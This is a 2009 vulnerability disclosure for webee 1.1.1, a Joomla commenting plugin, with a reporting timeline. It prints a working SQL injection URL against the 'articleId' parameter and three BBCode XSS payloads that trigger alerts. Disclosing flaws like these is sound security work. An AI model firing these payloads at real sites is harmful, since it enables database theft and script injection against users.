Sunday, 15 November 2009 00:00

webee 1.1.1, a Joomla commenting plugin, suffers from multiple vulnerabilities.

  1. SQL Injection

    The 'articleId' is not sanitized.
    index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 --
  2. [img] BBCode [color] Tag XSS

    [color=red;xss:expression(window.r?0:(alert(String.fromCharCode(88,83,83)),window.r=1))]XSS[/color]
  3. [url] BBCode [img] Tag XSS

    [img]http://foo.com/fake.png"/onerror="alert(String.fromCharCode(88,83,83))[/img]
  4. [size] BBCode [url] Tag XSS

    [url="/onmouseover="alert(String.fromCharCode(88,83,83))]XSS[/url]

UPDATE: webee has been updated to 1.2 as of 12 November 2009 and still suffers from SQL Injection. XSS was not tested in 1.2

Timeline

  • Vulnerabilities Discovered: 4 November 2009
  • Vendor Notified: 4 November 2009
  • Vendor Notified Again: 9 November 2009
  • Vendor Response: ... 2009
  • Update Available: ... 2009
  • Disclosure: 15 November 2009
Last Updated on Thursday, 30 September 2010 17:35
 

Add your comment

Your name:
Comment:
  The word for verification. Lowercase letters only with no spaces.
Word verification:

The Joomla!® name is used under a limited license from Open Source Matters in the United States and other countries. Jeff Channell is not affiliated with or endorsed by Open Source Matters or the Joomla!® Project.

Santorum
Joomla Extensions